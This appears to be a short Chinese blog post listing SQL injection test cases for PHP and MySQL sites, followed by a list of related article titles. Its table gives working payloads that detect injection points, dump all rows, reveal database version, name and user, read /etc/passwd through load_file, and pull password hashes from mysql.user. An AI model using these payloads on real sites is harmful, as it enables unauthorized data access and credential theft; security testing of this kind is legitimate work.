PHP+MySQL 网站 SQL 注入攻击测试用例
2013-12-02 14:05
531 查看
SQL注入攻击测试用例 | 说明 |
Night Night’ and 1=1# Night’ and 1=2# | 判断注入点。第一次是正常请求,如果存在注入漏洞,那么第二次请求得到结果应该与第一次一样,并且第三次请求得到的结果应该与前两次不同 |
Night’ or 1=1# | 返回所有数据,常用于有搜索功能的页面 |
Night’ union select version()# | 返回数据库版本信息 |
Night’ union select database()# | 返回当前的库名 |
Night’ union select user()# | 返回数据库的用户名信息 |
Night’ union select session_user()# | |
Night’ union select system_user()# | |
Night’ union select load_file(‘/etc/passwd’)# | 读取系统文件 |
Night’ select user ,password from mysql.user# | 返回数据库用户的密码信息,密码一般以MD5的方式存放 |
相关文章推荐
- PHP基础----PHP 与 MySQL----28用户数据添加与防 SQL 注入攻击
- ASP+SQL Server SQL 注入攻击测试用例
- PHP+MySQL环境下的SQL手工注入教程
- PHP MYSQL精确测试SQL语句执行时间
- PHP+SQL 注入攻击的技术实现以及预防办法
- PHP SQL 注入攻击的技术实现以及预防办法
- php+mysql注入环境搭建及测试(上)
- PHP SQL 注入攻击的技术实现以及预防办法
- 简单高效防注入攻击的动态多参数、动态SQL语句拼接方法,提高网站的安全性
- 安全性测试:著名的SQL流量注入(SQL注入)攻击法
- PHP SQL 注入攻击的技术实现以及预防办法
- PHP MYSQL注入攻击需要预防7个要点
- SQL注入之DVWA平台测试mysql注入
- PHP SQL 注入攻击的技术实现以及预防办法
- PHP SQL 注入攻击的技术实现以及预防办法
- PHP函数 addslashes() 和 mysql_real_escape_string() 的区别 && SQL宽字节,绕过单引号注入攻击
- Php+Mysql注入攻击详解
- SQL注入之DVWA平台测试mysql注入
- PHP mysql_real_escape_string() 函数防SQL注入
- unicode编码过php的magic_quotes_gpc设置为on的mysql注入与文件写入(待测试)